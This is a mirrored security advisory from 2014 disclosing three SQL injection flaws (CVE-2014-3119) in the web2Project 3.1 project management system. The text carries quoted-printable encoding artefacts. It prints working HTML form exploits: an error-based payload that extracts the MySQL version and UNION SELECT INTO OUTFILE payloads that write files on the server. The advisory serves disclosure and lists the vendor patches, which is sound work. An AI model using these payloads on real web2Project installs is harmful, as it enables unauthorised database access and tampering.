Multiple SQL Injection Vulnerabilities in web2Project

看板Bugtraq作者advisory.時間11年前 (2014/06/18 21:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

Advisory ID: HTB23213 Product: web2Project=20 Vendor: http://web2project.net Vulnerable Version(s): 3.1 and probably prior Tested Version: 3.1 Advisory Publication: April 30, 2014 [without technical details] Vendor Notification: April 30, 2014=20 Vendor Patch: May 1, 2014=20 Public Disclosure: June 18, 2014=20 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-3119 Risk Level: High=20 CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities = in web2Project, which can be exploited to perform SQL Injection attacks and= gain complete access to vulnerable website. 1) SQL Injection in web2Project: CVE-2014-3119 1.1 The vulnerability exists due to insufficient sanitization of the "searc= h_string" HTTP POST parameter passed to "/index.php" script. A remote authe= nticated user with privileges to access "contacts" module can inject and ex= ecute arbitrary SQL commands in application=E2=80=99s database and e.g. cre= ate, alter and delete information, or gain unauthorized access to vulnerabl= e website.=20 The following exploitation example displays version of the MySQL Server: <form action=3D"http://[host]/index.php?m=3Dcontacts" method=3D"post" name= =3D"main"> <input type=3D"hidden" name=3D"search_string" value=3D"'and(select 1 from(s= elect count(*),concat((select version() from information_schema.tables limi= t 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'"= > <input type=3D"submit" id=3D"btn"> </form> 1.2 The vulnerability exists due to insufficient sanitization of the "updat= ekey" HTTP POST parameter passed to "/do_updatecontact.php". This can be ex= ploited to manipulate SQL queries by injecting arbitrary SQL code. A remote= unauthenticated attacker can inject and execute arbitrary SQL commands in = application=E2=80=99s database and e.g. create, alter and delete informatio= n, or gain unauthorized access to vulnerable website. The following exploitation example writes the word "immuniweb" into file "f= ile.txt", depending on MySQL configuration and filesystem permissions: <form action=3D"http://[host]/do_updatecontact.php" method=3D"post" name=3D= "main"> <input type=3D"hidden" name=3D"updatekey" value=3D"' UNION SELECT 'immuniwe= b' INTO OUTFILE 'file.txt' -- "> <input type=3D"submit" id=3D"btn"> </form> 1.3 The vulnerability exists due to insufficient sanitization of the "updat= ekey" HTTP GET parameter passed to "/updatecontact.php" script. This can be= exploited to manipulate SQL queries by injecting arbitrary SQL code. A rem= ote unauthenticated attacker can inject and execute arbitrary SQL commands = in application=E2=80=99s database and e.g. create, alter and delete informa= tion, or gain unauthorized access to vulnerable website. The following exploitation example writes the word "immuniweb" info file "f= ile.txt", depending on MySQL configuration and filesystem permissions: <form action=3D"http://[host]/updatecontact.php" method=3D"get" name=3D"mai= n"> <input type=3D"hidden" name=3D"updatekey" value=3D"' UNION SELECT 'immuniwe= b' INTO OUTFILE 'file.txt' -- "> <input type=3D"submit" id=3D"btn"> </form> Successful exploitation of the vulnerabilities can grant an attacker unrest= ricted access to the website and its database. ---------------------------------------------------------------------------= -------------------- Solution: Apply vendor fixes: https://github.com/web2project/web2project/commit/eead99b36f62a8222d9f3a913= f1a2268200687ef https://github.com/web2project/web2project/commit/ab5ba92a6aaf0435cd0b2132c= f7f9b7b41575a28 ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23213 - https://www.htbridge.com/advisory/= HTB23213 - Multiple SQL Injection Vulnerabilities in web2Project. [2] web2Project - http://web2project.net/ - web2Project is a Free Open Sou= rce business-oriented Project Management System (PMS) built for the future= =2E [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE SaaS - https://www.htbridge.com/immuniweb/ - hybrid of = manual web application penetration test and cutting-edge vulnerability scan= ner available online via a Software-as-a-Service (SaaS) model. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 advisory. 的文章

文章代碼(AID): #1JeOsEUq (Bugtraq)